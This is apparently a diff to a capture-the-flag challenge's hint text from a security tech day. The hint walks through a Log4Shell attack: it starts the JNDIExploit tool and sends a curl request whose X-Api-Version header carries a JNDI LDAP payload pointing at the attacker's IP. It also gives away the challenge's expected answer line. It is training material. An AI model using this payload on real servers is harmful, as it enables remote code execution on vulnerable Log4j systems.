deep-security/tdc-2022-techday-2/challenges/file_storage_security/wording/src/task04/main.md

 Triple-check to make sure you’re using that IP address.

-The answer is the <i>whole last line</i> from the Terminal window where you first ran the JNDIExploit program.
+The answer is the whole last line from the Terminal Emulator window where you first ran the JNDIExploit program.
 Punctuation and all.

 ### HINT 3

 1. Open a Terminal Emulator window
 2. Run "hostname -I" to get your ip address
 3. Run "java –jar JNDIExploit-1.2-SNAPSHOT.jar -i YOURIP"
 4. Open another window and run "curl http://sudosingles-optimizer -H 'X-Api-Version: ${jndi:ldap://YOURIP:1389/Basic/SpringEcho}'"
 5. If you are successful, you should see a line that looks like the following show up in your original terminal window: "[+] Response code: 200"